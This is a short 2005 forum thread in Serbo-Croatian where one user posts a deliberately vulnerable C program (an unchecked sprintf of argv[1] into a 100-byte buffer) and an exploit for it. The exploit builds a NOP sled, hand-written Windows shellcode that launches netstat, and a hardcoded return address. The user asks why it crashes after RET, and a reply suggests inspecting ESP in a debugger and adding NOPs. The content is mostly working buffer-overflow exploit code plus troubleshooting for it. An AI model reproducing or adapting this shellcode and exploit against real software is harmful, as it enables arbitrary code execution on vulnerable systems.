[ `and @ 09.01.2005. 00:09 ] @
Vuln.c
Code:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char buffer[100];
sprintf(buffer,argv[1]);
return (0);
}


Exploit.c
Code:

#include <stdio.h>
#include <string.h>

main()
{
char filename[] = "vuln.exe ";

char shellcode[] =  "\x55\x8B\xEC\x33\xFF\x57"
                    "\xC6\x45\xF8\x4E"
                    "\xC6\x45\xF9\x45"
                    "\xC6\x45\xFA\x54"
                    "\xC6\x45\xFB\x53"
                    "\xC6\x45\xFC\x54"
                    "\xC6\x45\xFD\x41"
                    "\xC6\x45\xFE\x54"
                    "\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes

char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
              

char ret[] = "\xA4\xFE\x12\x00";

static char buffer[1000];
strcat(buffer,filename);
strcat(buffer,nops);
strcat(buffer, shellcode);
strcat(buffer,"IvanBBBB");
strcat(buffer,ret);
system(buffer);
}


I zasto ovo ne radi ? A kada hocu npr da pokrenem cmd ono radi ! Probao sam da pokrenem Notepad i nece, u ovom primeru pokusam da pokrenem netstat i nece !
Kaze da nesto nije u redu sa ESP, tj program mi se srusi odmah nakon RET !

tnx
[ Sundance @ 09.01.2005. 23:38 ] @
Pa otvori lijepo u debuggeru i vidi na sto ti pokazuje ESP u trenutku kad dobijes page fault. I onda popravi shellcode (dodaj jos NOP-ova, votevr).